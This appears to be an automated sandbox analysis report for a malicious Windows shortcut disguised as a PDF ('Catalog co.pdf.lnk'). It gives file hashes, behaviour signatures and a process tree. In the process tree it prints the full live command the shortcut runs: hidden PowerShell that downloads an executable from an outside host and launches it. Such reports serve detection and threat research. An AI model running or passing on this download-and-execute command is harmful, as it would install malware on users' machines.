Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
Catalog co.pdf.lnk
Resource
win7-20240708-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Catalog co.pdf.lnk
Resource
win10v2004-20240709-en
windows10-2004-x64
26 signatures
150 seconds
General
-
Target
Catalog co.pdf.lnk
-
Size
2KB
-
MD5
eb248558c413ed59d5f85b05ecba8213
-
SHA1
67b895b8372810fc71e4bc4b645225adff29239b
-
SHA256
b9bb4eb13cb09c25862151e98059905804034304d4c65d9efe1f2ad0da38301a
-
SHA512
215e64935fc7fd4ed15b85b96cf98871bbdd4cfd07f3cefaf89e9374709137a6136793f49182a0dfa3717e5418a7ebac47890ed5fd248f511804a81ef1671697
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2844 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2088 wrote to memory of 2756 2088 cmd.exe 32 PID 2088 wrote to memory of 2756 2088 cmd.exe 32 PID 2088 wrote to memory of 2756 2088 cmd.exe 32 PID 2756 wrote to memory of 2844 2756 cmd.exe 33 PID 2756 wrote to memory of 2844 2756 cmd.exe 33 PID 2756 wrote to memory of 2844 2756 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Catalog co.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden iwr -Uri http://ie-servenet.shop/azHOsXsN/Major_0x00012BD4C3BDF0.exe -OutFile $env:TEMP\Major_0x00012BD4C3BDF0.exe;Start-Process $env:TEMP\Major_0x00012BD4C3BDF0.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden iwr -Uri http://ie-servenet.shop/azHOsXsN/Major_0x00012BD4C3BDF0.exe -OutFile $env:TEMP\Major_0x00012BD4C3BDF0.exe;Start-Process $env:TEMP\Major_0x00012BD4C3BDF0.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-